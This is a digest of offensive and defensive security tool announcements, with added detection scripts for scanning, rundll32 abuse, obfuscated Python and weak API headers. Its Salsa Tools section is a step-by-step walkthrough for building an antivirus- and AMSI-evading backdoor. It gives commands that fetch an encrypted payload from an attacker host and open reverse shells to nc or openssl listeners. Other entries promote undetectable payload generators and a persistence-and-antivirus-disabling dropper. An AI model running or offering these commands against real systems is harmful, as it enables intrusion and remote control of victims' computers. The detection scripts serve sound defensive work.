Getwin – FUD Win32 Payload Generator And Listener

FUD Win32 payload generator and listener.

Legal disclaimer: Usage of GetWin for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.

Features
* FUD: Fully Undetectable
* No need to configure port forwarding or to install other programs; it uses only ssh and serveo.net.

Usage:
git clone https://github.com/thelinuxchoice/getwin
cd getwin
bash getwin.sh

Install requirements (mingw-w64):
sudo apt-get install mingw-w64

Download Getwin

Link: http://feedproxy.google.com/~r/PentestTools/~3/nJnC39lKrHQ/getwin-fud-win32-payload-generator-and.html

Rustbuster – DirBuster For Rust

DirBuster for Rust.

Usage
There are three modules currently implemented:

Dirbuster (default):
rustbuster -m dir -u http://localhost:3000/ -w examples/wordlist -e php

Dnsbuster:
rustbuster -m dns -u google.com -w examples/wordlist

Vhostbuster:
rustbuster -m vhost -u http://localhost:3000/ -w examples/wordlist -d test.local -x "Hello"

~ rustbuster v. 1.2.0 ~ by phra & ps1dr3x ~

USAGE:
    rustbuster [FLAGS] [OPTIONS] --url <url> --wordlist <wordlist>

FLAGS:
    -f, --append-slash          Tries to also append / to the base request
    -K, --exit-on-error         Exits on connection errors
    -h, --help                  Prints help information
    -k, --ignore-certificate    Disables TLS certificate validation
        --no-banner             Skips initial banner
        --no-progress-bar       Disables the progress bar
    -V, --version               Prints version information
    -v, --verbose               Sets the level of verbosity

OPTIONS:
    -d, --domain <domain>                                Uses the specified domain
    -e, --extensions <extensions>                        Sets the extensions [default: ]
    -b, --http-body <http-body>                          Uses the specified HTTP body [default: ]
    -H, --http-header <http-header>...                   Appends the specified HTTP header
    -X, --http-method <http-method>                      Uses the specified HTTP method [default: GET]
    -S, --ignore-status-codes <ignore-status-codes>      Sets the list of status codes to ignore [default: 404]
    -x, --ignore-string <ignore-string>...               Ignores results with specified string in vhost mode
    -s, --include-status-codes <include-status-codes>    Sets the list of status codes to include [default: ]
    -m, --mode <mode>                                    Sets the mode of operation (dir, dns, fuzz) [default: dir]
    -o, --output <output>                                Saves the results in the specified file [default: ]
    -t, --threads <threads>                              Sets the amount of concurrent requests [default: 10]
    -u, --url <url>                                      Sets the target URL
    -a, --user-agent <user-agent>                        Uses the specified User-Agent [default: rustbuster]
    -w, --wordlist <wordlist>                            Sets the wordlist

Download Rustbuster
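From the defender's side, a wordlist scan like the one rustbuster performs leaves a characteristic trace in the web server access log: a burst of requests from one client, most of them answered 404, often with the tool's default User-Agent ("rustbuster", see the -a option above). The following script is an added example for this digest, not code from the rustbuster project; the access-log lines are constructed, the agent watchlist and the burst/404 thresholds are assumptions to tune per site.

```python
"""Spot directory brute-forcing (rustbuster-style) in web server access logs.

Added example, not part of rustbuster. Sample log lines are constructed; the
thresholds and the tool User-Agent watchlist are assumptions.
"""
import re
from collections import defaultdict
from datetime import datetime

# Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
KNOWN_TOOL_AGENTS = {"rustbuster", "dirbuster", "gobuster"}  # assumed watchlist

# Constructed sample: one scanning client and one ordinary browser client.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jun/2019:12:00:01 +0000] "GET /admin HTTP/1.1" 404 162 "-" "rustbuster"
203.0.113.7 - - [10/Jun/2019:12:00:01 +0000] "GET /backup HTTP/1.1" 404 162 "-" "rustbuster"
203.0.113.7 - - [10/Jun/2019:12:00:02 +0000] "GET /config.php HTTP/1.1" 404 162 "-" "rustbuster"
203.0.113.7 - - [10/Jun/2019:12:00:02 +0000] "GET /login.php HTTP/1.1" 200 1532 "-" "rustbuster"
203.0.113.7 - - [10/Jun/2019:12:00:03 +0000] "GET /test.php HTTP/1.1" 404 162 "-" "rustbuster"
198.51.100.4 - - [10/Jun/2019:12:00:05 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Jun/2019:12:00:06 +0000] "GET /missing.png HTTP/1.1" 404 162 "-" "Mozilla/5.0"
"""


def parse_log(text):
    """Parse combined-format lines into dicts; lines that do not match are skipped."""
    entries = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        e = m.groupdict()
        e["ts"] = datetime.strptime(e["ts"], "%d/%b/%Y:%H:%M:%S %z")
        e["status"] = int(e["status"])
        entries.append(e)
    return entries


def max_requests_in_window(times, window_s):
    """Largest number of requests falling inside any window of window_s seconds."""
    times = sorted(times)
    best, start = 0, 0
    for end, t in enumerate(times):
        while (t - times[start]).total_seconds() > window_s:
            start += 1
        best = max(best, end - start + 1)
    return best


def find_bruteforce(entries, window_s=60, min_burst=5, min_404_ratio=0.6):
    """Return {ip: summary} for clients whose traffic looks like a wordlist scan."""
    by_ip = defaultdict(list)
    for e in entries:
        by_ip[e["ip"]].append(e)
    flagged = {}
    for ip, reqs in by_ip.items():
        not_found = sum(1 for e in reqs if e["status"] == 404)
        burst = max_requests_in_window([e["ts"] for e in reqs], window_s)
        agents = {e["ua"] for e in reqs}
        tool_agent = any(a.lower() in KNOWN_TOOL_AGENTS for a in agents)
        ratio = not_found / len(reqs)
        # Either a burst of mostly-404 traffic or a known tool UA is enough to flag.
        if (burst >= min_burst and ratio >= min_404_ratio) or tool_agent:
            flagged[ip] = {
                "requests": len(reqs),
                "not_found": not_found,
                "burst": burst,
                "user_agents": agents,
                "tool_agent": tool_agent,
            }
    return flagged


if __name__ == "__main__":
    for ip, info in find_bruteforce(parse_log(SAMPLE_LOG)).items():
        print(ip, info)
```

The User-Agent match is the cheap signal and disappears as soon as the operator sets -a, so the burst-of-404s rule is the one worth keeping in a production detection; a scan that uses --ignore-status-codes still has to receive those 404s from the server.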

Link: http://feedproxy.google.com/~r/PentestTools/~3/HFSIPHDgci8/rustbuster-dirbuster-for-rust.html

Salsa Tools – ShellReverse TCP/UDP/ICMP/DNS/SSL/BINDTCP and AV bypass, AMSI patched

Salsa Tools is a collection of three different tools that, combined, allow you to get a reverse shell on steroids in any Windows environment without even needing PowerShell for its execution. In order to avoid the latest detection techniques (AMSI), most of the components were initially written in C#. Salsa Tools was publicly released by Luis Vacas during his talk "Inmersión en la explotación tiene rima", which took place at h-c0n on 9th February 2019.

Features
* TCP/UDP/ICMP/DNS/BIND/SSL
* AV Safe (17th February)
* AMSI patchers
* PowerShell execution
* ...

Overview
Salsa-Tools is made from three different ingredients:
– EvilSalsa
– EncrypterAssembly
– SalseoLoader
And its behavior is as follows:

Setup
Requirements
Visual Studio 2017 (or similar)
Python 2.7

Running la Salsa

Cooking EvilSalsa
[+] That is our Payload

EvilSalsa is the key ingredient of this recipe. It contains the payload, which is executed on the system as follows: as soon as the payload starts, it runs System.Management.Automation.dll, which creates a runspace. Within that runspace we have four types of shells (TCP / UDP / ICMP / DNS / BINDTCP). Once EvilSalsa is loaded, first thing first, the existence of c:\windows\system32\amsi.dll is checked. If it exists, it is patched using a home-cooked variant of the CyberArk and Rastamouse bypasses.

Mixing EncrypterAssembly and EvilSalsa
[+] Software that encrypts the payload using RC4
[+] We have the version in python and the version in .exe

EncrypterAssembly can be used as a Python script or as an Exe binary. It encrypts the previously generated EvilSalsa.

Python usage:
python encrypterassembly.py <FILE> <PASSWORD> <OUTPUT>

Executable usage:
Encrypterassembly.exe <FILE> <PASSWORD> <OUTPUT>

Bringing the Encrypted EvilSalsa to the table with SalseoLoader
SalseoLoader is in charge of loading the encrypted payload. It can be compiled either as a library or as an executable. If it is run as an executable, the chosen arguments must be provided when the executable is run. If it is compiled as a library, the descriptor "main" must be exported, and the arguments are passed using environment variables.

By: CyberVaca@HackPlayers
[+] Usage:
[-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt ReverseTCP LHOST LPORT
[-] SalseoLoader.exe password \\smbserver.com\evil\elfuckingmal.txt ReverseUDP LHOST LPORT
[-] SalseoLoader.exe password c:\temp\elfuckingmal.txt ReverseICMP LHOST
[-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt ReverseDNS LHOST ServerDNS
[-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt BindTCP LHOST LPORT
[-] SalseoLoader.exe password c:\temp\elfuckingmal.txt ReverseSSL LHOST LPORT
[-] SalseoLoader.exe password http://webserver.com/shellcode.txt shellcode
[+] Shells available:
[-] ReverseTCP
[-] ReverseDNS
[-] ReverseSSL
[-] Shellcode
[-] ReverseUDP
[-] ReverseICMP
[-] BindTCP

Tutorial

Compiling the binaries
Download the source code from GitHub and compile EvilSalsa and SalseoLoader. You will need Visual Studio installed to compile the code.
Compile those projects for the architecture of the Windows box where you are going to use them (if the Windows box supports x64, compile them for that architecture).
You can select the architecture inside Visual Studio in the left "Build" tab, in "Platform Target". (If you can't find this option, press the "Project" tab and then "Properties".)
Then, build both projects (Build -> Build Solution). The path of the executable will appear in the logs.

Prepare the Backdoor
First of all, you will need to encode the EvilSalsa.dll. To do so, you can use the python script encrypterassembly.py, or you can compile the project EncrypterAssembly.

Python:
python EncrypterAssembly/encrypterassembly.py <FILE> <PASSWORD> <OUTPUT_FILE>
python EncrypterAssembly/encrypterassembly.py EvilSalsa.dll password evilsalsa.dll.txt

Windows:
EncrypterAssembly.exe <FILE> <PASSWORD> <OUTPUT_FILE>
EncrypterAssembly.exe EvilSalsa.dll password evilsalsa.dll.txt

Ok, now you have everything you need to execute all the Salseo thing: the encoded EvilSalsa.dll and the binary of SalseoLoader. Upload the SalseoLoader.exe binary to the machine. It shouldn't be detected by any AV...

Execute the backdoor

Getting a TCP reverse shell (downloading encoded dll through HTTP)
Remember to start a nc as the reverse shell listener, and a HTTP server to serve the encoded evilsalsa.
SalseoLoader.exe password http://<Attacker-IP>/evilsalsa.dll.txt reversetcp <Attacker-IP> <Port>

Getting a UDP reverse shell (downloading encoded dll through SMB)
Remember to start a nc as the reverse shell listener, and a SMB server to serve the encoded evilsalsa (impacket-smbserver).
SalseoLoader.exe password \\<Attacker-IP>/folder/evilsalsa.dll.txt reverseudp <Attacker-IP> <Port>

Getting a TCP reverse shell SSL (using local file)
Set the listener inside the attacker machine:
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
openssl s_server -key key.pem -cert cert.pem -port <port> -tls1
Execute the backdoor:
SalseoLoader.exe password C:/path/to/evilsalsa.dll.txt ReverseSSL <Attacker-IP> <Port>

Getting a ICMP reverse shell (encoded dll already inside the victim)
This time you need a special tool in the client to receive the reverse shell.
Download: https://github.com/inquisb/icmpsh
Disable ICMP Replies:
# When you finish, you can enable them again by running:
sysctl -w net.ipv4.icmp_echo_ignore_all=0
Execute the client:
python icmpsh_m.py "<Attacker-IP>" "<Victim-IP>"
Inside the victim, let's execute the salseo thing:
SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp <Attacker-IP>

Compiling SalseoLoader as DLL exporting main function
Open the SalseoLoader project using Visual Studio.
Add this line before the main function: [DllExport]

Install DllExport for this project
Tools --> NuGet Package Manager --> Manage NuGet Packages for Solution...
Search for the DllExport package (using the Browse tab), and press Install (and accept the popup).
The files DllExport.bat and DllExport_Configure.bat will have appeared in your project folder.

Uninstall DllExport
Press Uninstall (yeah, it's weird, but trust me, it is necessary).

Exit Visual Studio and execute DllExport_configure
Just exit Visual Studio.
Then, go to your SalseoLoader folder and execute DllExport_Configure.bat.
Select x64 (if you are going to use it inside a x64 box, that was my case), select System.Runtime.InteropServices (inside Namespace for DllExport) and press Apply.

Open the project again with Visual Studio
[DllExport] should no longer be marked as an error.

Build the solution
Select Output Type = Class Library (Project --> SalseoLoader Properties --> Application --> Output type = Class Library).
Select x64 platform (Project --> SalseoLoader Properties --> Build --> Platform target = x64).
To build the solution: Build --> Build Solution (the path of the new DLL will appear inside the Output console).

Test the generated Dll
Copy and paste the Dll where you want to test it.
Execute:
rundll32.exe SalseoLoader.dll,main
If no error appears, you probably have a functional dll!!

Get a shell using the Dll
Don't forget to use a HTTP server and set a nc listener.

Powershell:
$env:pass="password"
$env:payload="http://10.2.0.5/evilsalsax64.dll.txt"
$env:lhost="10.2.0.5"
$env:lport="1337"
$env:shell="reversetcp"
rundll32.exe SalseoLoader.dll,main

CMD: the same variables can be set from CMD before running rundll32.exe.

Documented by https://github.com/carlospolop-forks/

Download Salsa-tools
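The DLL variant above is launched with "rundll32.exe SalseoLoader.dll,main", i.e. a signed Windows binary loading a DLL from wherever the operator dropped it. For defenders, that is the part worth alerting on: rundll32 normally loads DLLs that live under the system directories, so a DLL path under a user profile or a bare DLL name resolved from the current directory stands out. The script below is an added example for this digest, not part of Salsa Tools; the process-creation events are constructed (shaped like an EDR or Sysmon event 1: image, command line, parent) and the allowlist of system DLLs is an assumption to extend.

```python
"""Flag rundll32.exe launches that load a DLL from outside the Windows system
directories, as in "rundll32.exe SalseoLoader.dll,main".

Added example, not part of Salsa Tools. EVENTS are constructed process
creation records; KNOWN_SYSTEM_DLLS is an assumed allowlist.
"""
import re

# rundll32 <dll>,<entrypoint> [args]   (image and DLL path may be quoted)
RUNDLL_RE = re.compile(
    r'^\s*"?(?:[^"\s]*\\)?rundll32(?:\.exe)?"?\s+"?(?P<dll>[^",]+?)"?\s*,\s*(?P<entry>[^\s,]+)',
    re.IGNORECASE,
)
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# Bare DLL names Windows itself commonly launches through rundll32 (assumed allowlist).
KNOWN_SYSTEM_DLLS = {"shell32.dll", "url.dll", "inetcpl.cpl", "user32.dll", "printui.dll"}

EVENTS = [  # constructed sample events
    {"image": r"C:\Windows\System32\rundll32.exe",
     "command_line": r"rundll32.exe C:\Users\alice\AppData\Local\Temp\SalseoLoader.dll,main",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"image": r"C:\Windows\System32\rundll32.exe",
     "command_line": r"rundll32.exe SalseoLoader.dll,main",
     "parent": r"C:\Windows\System32\cmd.exe"},
    {"image": r"C:\Windows\System32\rundll32.exe",
     "command_line": r'"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\shell32.dll",Control_RunDLL hotplug.dll',
     "parent": r"C:\Windows\explorer.exe"},
    {"image": r"C:\Windows\System32\rundll32.exe",
     "command_line": r"rundll32.exe url.dll,FileProtocolHandler https://example.com/",
     "parent": r"C:\Windows\explorer.exe"},
    {"image": r"C:\Windows\System32\notepad.exe",
     "command_line": r"notepad.exe C:\Users\alice\notes.txt",
     "parent": r"C:\Windows\explorer.exe"},
]


def parse_rundll32(command_line):
    """Return (dll, entrypoint) from a rundll32 command line, or None if it is not one."""
    m = RUNDLL_RE.match(command_line)
    if not m:
        return None
    return m.group("dll").strip(), m.group("entry")


def rundll32_reasons(event):
    """List the reasons a rundll32 event looks suspicious (empty list = nothing found)."""
    if not event["image"].lower().endswith("\\rundll32.exe"):
        return []
    parsed = parse_rundll32(event["command_line"])
    if parsed is None:
        return ["rundll32 without a dll,entrypoint argument"]
    dll, entry = parsed
    dll_norm = dll.replace("/", "\\").lower()
    reasons = []
    if "\\" in dll_norm:
        if not dll_norm.startswith(SYSTEM_DIRS):
            reasons.append(f"dll loaded from outside the system directories: {dll}")
    elif dll_norm not in KNOWN_SYSTEM_DLLS:
        # A bare name is resolved through the DLL search path, which starts in the
        # current directory, so an unknown bare name points at a planted DLL.
        reasons.append(f"unqualified dll name not in the system allowlist: {dll}")
    if reasons:
        reasons.append(f"entrypoint {entry}, parent {event['parent']}")
    return reasons


def scan_events(events):
    """Return [(command_line, reasons)] for every flagged event."""
    hits = []
    for ev in events:
        reasons = rundll32_reasons(ev)
        if reasons:
            hits.append((ev["command_line"], reasons))
    return hits


if __name__ == "__main__":
    for cmd, why in scan_events(EVENTS):
        print(cmd)
        for r in why:
            print("   -", r)
```

The loader reads its parameters from environment variables rather than the command line, so the process record alone does not show the payload URL or listener address; correlating the rundll32 event with the parent shell and with outbound connections from rundll32.exe closes that gap.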

Link: http://feedproxy.google.com/~r/PentestTools/~3/Xgz-WkNK1wE/salsa-tools-shellreverse.html

Intensio-Obfuscator – Obfuscate A Python Code 2.X And 3.X

Takes a Python source code and transforms it into an obfuscated Python code: replaces the names of variables, classes and functions with random chars of a defined length, removes comments and line breaks, and adds to each line a random script with always different values.

Requirement
Python >= 3.5

Files supported
Files written in Python 2.x and 3.x

Installation
git clone https://github.com/Hnfull/Intensio-Obfuscator.git
cd Intensio-Obfuscator/intensio/

Features
Feature      | Description
Replace      | Replace all names of variables, classes and functions defined, and remove all line breaks
Padding      | Add random scripts after each line and remove all line breaks
Remove       | Remove all comments and all line breaks
Secret       | Only for the curious :)
Mixer lower  | Generate words with 32 chars that replace variables, classes and functions defined in the source code and in random scripts if the 'replace' or 'padding' features are specified
Mixer medium | Generate words with 64 chars that replace variables, classes and functions defined in the source code and in random scripts if the 'replace' or 'padding' features are specified
Mixer high   | Generate words with 128 chars that replace variables, classes and functions defined in the source code and in random scripts if the 'replace' or 'padding' features are specified

Usages
-h, --help          -> show this help message and exit.
-f, --onefile       -> if only one file.
-d, --multiplefiles -> if multiple files (project).
-i, --input         -> source file or directory; if multiple files, indicate a directory that contains all your files.
-c, --code          -> language used in input file or directory. value: [python]
-o, --output        -> output file or directory that will be obfuscated; if multiple files, indicate an empty directory that will contain all your files.
-m, --mixer         -> length level of variables mix output. values: [lower,medium,high]
-r, --replace       -> activate the 'replace' obfuscation feature.
-p, --padding       -> activate the 'padding' obfuscation feature.
-rm, --remove       -> activate the 'remove' obfuscation feature.
-s, --secret        -> activate the 'secret' bullshit feature.

If you want to exclude Python variables, classes or functions which would otherwise be taken by the 'replace' feature, edit intensio/exclude_python_words.txt.
If you want to include Python variables, classes or functions that are not included when launching the 'replace' feature, edit intensio/include_python_words.txt.
Do not give your local variables, classes or functions names identical to Python keywords or to names of functions or classes of imported Python libraries!!

Examples
Python target file(s):

Multiple files, basic:
python3.x intensio_obfuscator.py -d -i test/python/multiplefiles/basic/input/basicRAT -c python -o test/python/multiplefiles/basic/output/basicRAT -m lower -r -rm

Multiple files, advanced:
python3.x intensio_obfuscator.py -d -i test/python/multiplefiles/advanced/input/basicRAT -c python -o test/python/multiplefiles/advanced/output/basicRAT -m high -r -p -rm

If it's one file only, the command is the same as for multiple files; just point the -i and -o parameters at a Python file directly instead of a directory, and change the -d parameter into -f.

Possible malfunctions
If a variable, class or function has the same name as a word between ' ' or " " in a print() function, your text will get the same value as the mixed variable, class or function.
If a variable, class or function has the same name as a word after # (comment), your text will get the same value as the mixed variable, class or function; but if it is between """ or ''' without a variable before, no replacing is performed.
If you named your variables, classes or functions in the same way as Python keywords or names of functions/classes of imported Python libraries, an error may appear. Edit intensio/excluded_python_words.txt to add the variables not to obfuscate, or change the names of your local variables, classes and functions; if your variables, classes or functions have the same name as a keyword, it will be obfuscated and errors will appear.

Todo
Version 1.0.1-x:
* Code optimization
* Fix bugs and problems
* Improve features already present
Version 1.1.0: Support files written in C
Version 1.2.0: Support files written in C++

Disclaimer
Intensio-Obfuscator is for education/research purposes only. The author takes NO responsibility for how you choose to use any of the tools provided.

Download Intensio-Obfuscator
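The mixer levels described above give a reviewer a cheap fingerprint: every user-defined identifier becomes a letters-only word of exactly 32, 64 or 128 characters, and the 'remove' feature leaves no comments at all. The following script is an added example for this digest, not part of Intensio-Obfuscator; it tokenizes Python source with the standard library and reports how many of the identifiers match that pattern. Both source samples are constructed (the obfuscated one is built here with 32-character names, the 'lower' mixer length), and the 50% threshold is an assumption.

```python
"""Heuristic check for Intensio-style obfuscated Python: identifiers replaced by
32/64/128-character random words and comments stripped.

Added example, not part of Intensio-Obfuscator. CLEAN_SAMPLE and
OBFUSCATED_SAMPLE are constructed; the min_ratio threshold is an assumption.
"""
import builtins
import io
import keyword
import random
import string
import tokenize

BUILTIN_NAMES = set(dir(builtins))
MIXER_LENGTHS = (32, 64, 128)  # word lengths produced by mixer lower/medium/high

CLEAN_SAMPLE = '''\
# add two numbers
def add(x, y):
    return x + y

total = add(1, 2)
print(total)
'''


def _random_name(rng, length):
    return "".join(rng.choices(string.ascii_letters, k=length))


def _build_obfuscated_sample(length=32, seed=1):
    """Rewrite CLEAN_SAMPLE the way the 'replace' + 'remove' features would."""
    rng = random.Random(seed)
    f, a, b, c = (_random_name(rng, length) for _ in range(4))
    return f"def {f}({a}, {b}):\n    return {a} + {b}\n{c} = {f}(1, 2)\nprint({c})\n"


OBFUSCATED_SAMPLE = _build_obfuscated_sample()


def looks_mixed(name):
    """True for a letters/digits-only identifier whose length is a mixer length."""
    return len(name) in MIXER_LENGTHS and name.isalnum()


def identifier_stats(source, min_ratio=0.5):
    """Tokenize source and report how obfuscated its identifiers look."""
    names = 0
    mixed = 0
    comments = 0
    for tok in tokenize.generate_tokens(io.StringIO(source).readline):
        if tok.type == tokenize.COMMENT:
            comments += 1
        elif (tok.type == tokenize.NAME and not keyword.iskeyword(tok.string)
              and tok.string not in BUILTIN_NAMES):
            # Only user identifiers count: keywords and builtins are never renamed.
            names += 1
            if looks_mixed(tok.string):
                mixed += 1
    ratio = mixed / names if names else 0.0
    return {
        "identifiers": names,
        "mixed_identifiers": mixed,
        "mixed_ratio": ratio,
        "comments": comments,
        "suspicious": ratio >= min_ratio,
    }


if __name__ == "__main__":
    print("clean     ", identifier_stats(CLEAN_SAMPLE))
    print("obfuscated", identifier_stats(OBFUSCATED_SAMPLE))
```

Because the check works on tokens rather than on raw text, a 32-character word inside a string literal or comment is not counted, which is the same distinction the 'Possible malfunctions' section says the obfuscator itself does not make.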

Link: http://feedproxy.google.com/~r/PentestTools/~3/0dAHTVR5GAU/intensio-obfuscator-obfuscate-python.html

Yaazhini – Free Android APK & API Vulnerability Scanner

Yaazhini is a free vulnerability scanner for Android APKs and APIs. It is a user-friendly tool with which you can easily scan any APK and API of an Android application and find the vulnerabilities. Yaazhini includes a vulnerability scan of the API, a vulnerability scan of the APK, and a reporting section to generate a report.

System Requirements
Operating Systems: Mac OSX (64bit), Windows (64bit & 32bit)
RAM: Minimum 4GB of available memory; 16GB required for larger Android apps
Storage: 10GB of available disk space
Dependency Software: Java 1.8+

Advantages of Yaazhini
* Scan Android APK with just one click
* Scan Android Application REST API (emulator, device)
* Generate report
* Free to use
* Easy to use

How to use Yaazhini Android Application APK Scanner
Start the Yaazhini Application.
Provide the project name.
Upload the APK file.
Click on the Upload & Scan button.
After the scan is completed, you can see all details of the vulnerabilities and generate the report.

Yaazhini – Android Application Rest API Scanner
Yaazhini – Android Application Rest API Scanner can help you to find the following attacks:
* SQL Injection
* Command Injection
* Header Injection
* Cross-site Scripting (possibilities)
* Missing Security Headers
* Sensitive Information Disclosure in Response Headers
* Sensitive Information Disclosure in Error messages
* Missing Server Side Input Validation
* Unwanted Use of HTTP Methods
* Improper HTTP Response
* and more

How to use Yaazhini Android Application Rest Scanner
Start the application.
Create a new project.
Add the new request in the created project.
Provide proper headers, URL, and data.
Save and run the scan from the menu bar.
After the scan is completed, click on Generate Report from the menu bar.

Sample Reports for Yaazhini
Yaazhini – Android APK Scanner Sample report: the report starts with a quick summary of the findings and risk ratings. Each finding has a detailed explanation in terms of risk and recommendations about the vulnerability. The vulnerabilities are ordered by risk level.
Get Here: Yaazhini-Android APK Scanner Sample Report.
Yaazhini – Mobile Application Scanner Sample report: the report starts with a quick summary of the findings and risk ratings. Each finding has a detailed explanation in terms of risk and recommendations about the vulnerability. The vulnerabilities are ordered by risk level.
Get Here: Yaazhini- Mobile Application Scanner Sample report.

Download Yaazhini
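Three of the API finding classes listed above (Missing Security Headers, Sensitive Information Disclosure in Response Headers, Sensitive Information Disclosure in Error messages) can be checked directly against a captured response. The script below is an added example for this digest, not Yaazhini's own code; the required-header set, the one-year minimum HSTS max-age and the error-leak patterns are assumptions, and both responses are constructed.

```python
"""Audit an HTTP API response for missing security headers, stack-revealing
headers and error messages that leak implementation details.

Added example, not code from Yaazhini. Header policy, HSTS minimum and
error-leak patterns are assumptions; WEAK_* and GOOD_* responses are constructed.
"""
import re


def _hsts_ok(value):
    """HSTS must carry a max-age of at least one year (assumed minimum)."""
    m = re.search(r"max-age=(\d+)", value, re.I)
    return bool(m) and int(m.group(1)) >= 31536000


# Headers an API response is expected to carry: name -> value check (None = presence only).
REQUIRED_HEADERS = {
    "strict-transport-security": _hsts_ok,
    "x-content-type-options": lambda v: v.strip().lower() == "nosniff",
    "x-frame-options": lambda v: v.strip().upper() in ("DENY", "SAMEORIGIN"),
    "content-security-policy": None,
    "cache-control": lambda v: "no-store" in v.lower(),
}
# Headers that reveal the technology stack; a version number makes it worse.
DISCLOSURE_HEADERS = ("server", "x-powered-by", "x-aspnet-version", "x-aspnetmvc-version")
# Fragments of stack traces and database errors that should never reach a client.
ERROR_LEAK_RE = re.compile(
    r"Traceback \(most recent call last\)|Exception|ORA-\d{5}|SQLSTATE|\bat [\w.$]+\(", re.I
)

WEAK_HEADERS = {  # constructed
    "Content-Type": "application/json",
    "Server": "Apache/2.4.29 (Ubuntu)",
    "X-Powered-By": "PHP/7.2.19",
    "X-Content-Type-Options": "none",
    "Cache-Control": "public, max-age=600",
}
WEAK_BODY = '{"error": "SQLSTATE[42000]: Syntax error near \'1\'"}'

GOOD_HEADERS = {  # constructed
    "Content-Type": "application/json",
    "Strict-Transport-Security": "max-age=63072000; includeSubDomains",
    "X-Content-Type-Options": "nosniff",
    "X-Frame-Options": "DENY",
    "Content-Security-Policy": "default-src 'none'; frame-ancestors 'none'",
    "Cache-Control": "no-store",
    "Server": "nginx",
}
GOOD_BODY = '{"ok": true}'


def audit_response(headers, body=""):
    """Return findings: missing headers, weak header values, disclosures, error leak."""
    lower = {k.lower(): v for k, v in headers.items()}  # header names are case-insensitive
    missing, weak, disclosure = [], {}, []
    for name, check in REQUIRED_HEADERS.items():
        if name not in lower:
            missing.append(name)
        elif check is not None and not check(lower[name]):
            weak[name] = lower[name]
    for name in DISCLOSURE_HEADERS:
        if name in lower:
            value = lower[name]
            versioned = bool(re.search(r"\d+\.\d+", value))
            disclosure.append((name, value, versioned))
    error_leak = bool(ERROR_LEAK_RE.search(body))
    return {"missing": missing, "weak": weak, "disclosure": disclosure, "error_leak": error_leak}


if __name__ == "__main__":
    for label, h, b in (("weak", WEAK_HEADERS, WEAK_BODY), ("good", GOOD_HEADERS, GOOD_BODY)):
        print(label, audit_response(h, b))
```

A bare product name in Server (as in the hardened sample) is still reported, only without the versioned flag, so the rating can be lowered rather than the finding dropped.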

Link: http://feedproxy.google.com/~r/PentestTools/~3/6kC6ytwB1jU/yaazhini-free-android-apk-api.html

Faraday v3.8 – Collaborative Penetration Test and Vulnerability Management Platform

Here are the main new features and improvements in Faraday v3.8:

Set up Faraday with a double click!
We are committed to facilitating your work processes. With that in mind, we enhanced our installation phases, so now it's easier to have Faraday on your devices: you can download our platform with just two clicks. This is the first step of the hard work we're doing to migrate our platform to Python 3 (in progress!).

Sailing downwind with Faraday on Docker!
Explore Faraday's whole potential by testing it first with our new Docker images. When you are ready, you can download the whole thing to set it up and upgrade your Risk Management Ecosystem :)

More powerful than a sticky note!
To provide value, information must be complete, updated and well focused. Now you can enrich Vuln data by leaving Comments and Notes, while mentioning other users to notify them about important events in real time. Also, you are now able to configure alerts to follow up on each project, giving you a more efficient view of their status and updates. The idea behind this is to promote better ways to get involved with your co-workers by improving communication and daily results.

New setting options on Web UI!
Forget about logging in each time you want to send a Vuln to Jira or ServiceNOW. Just configure the ticketing tool you'll be using from the Settings menu and enjoy working seamlessly.

Download Faraday v3.8

Link: http://www.kitploit.com/2019/06/faraday-v38-collaborative-penetration.html

Recsech – Tool For Doing Footprinting And Reconnaissance On The Target Web

Recsech is a tool for doing Footprinting and Reconnaissance on the target web. Recsech collects information such as DNS information, subdomains, HoneySpot detection, subdomain takeovers, reconnaissance on GitHub and much more; see the features list below.

Features in tools
Name                     | Release | Release Date
Auto request with Proxy  | yes     | 01/05/19
Find Email               | yes     | 01/05/19
HoneySpot Detected       | yes     | 01/05/19
Subdomain takeover       | yes     | 01/05/19
Check Technologies       | yes     | 01/05/19
Whois                    | no      | N/A
Crlf injection           | no      | N/A
Header Security          | yes     | 01/05/19
Update Check             | yes     | 01/05/19
Port Scanner             | yes     | 02/05/19
Sort Domain By IP        | yes     | 02/05/19
WordPress audit          | no      | N/A
Reconnaissance On Github | yes     | 02/05/19
Language Selection       | yes     | 02/05/19
WAF                      | yes     | 03/05/19

Requirements for using this tool
We need several requirements to use this tool to run smoothly.
Linux: PHP 7.x, PHP curl
Windows: XAMPP >= 7.3.5

Installation
You can download the latest tarball by clicking here or the latest zipball by clicking here.
Preferably, you can download Recsech by cloning the Git repository:
git clone --depth 1 https://github.com/radenvodka/Recsech.git Recsech

Recsech Environment Windows (Command Prompt Windows)
Download Recsech
How to install to Windows CLI:
Extract all files in C:\Windows
Edit the file Recsech.bat, then set your PHP path (if you have installed xampp on your C drive you don't need to do this step):
@echo off
set PATH=%PATH%;C:\xampp\php
title Recsech - Recon and Research
php "C:\Windows\Recsech.php" %1
Open cmd and run the Recsech command.

Usage
It is enough to execute the command:
php Recsech.php example.com
or if it doesn't work, use the command:
php Recsech.php debug
and don't forget to ask at the issue page.

Download Recsech

Link: http://feedproxy.google.com/~r/PentestTools/~3/fA2yZMgyywc/recsech-tool-for-doing-footprinting-and.html

GhostDelivery – This Tool Creates A Obfuscated .vbs Script To Download A Payload Hosted On A Server To %TEMP% Directory, Execute Payload And Gain Persistence

Python script to generate an obfuscated .vbs script that delivers a payload with persistence and Windows antivirus disabling functions.

Features:
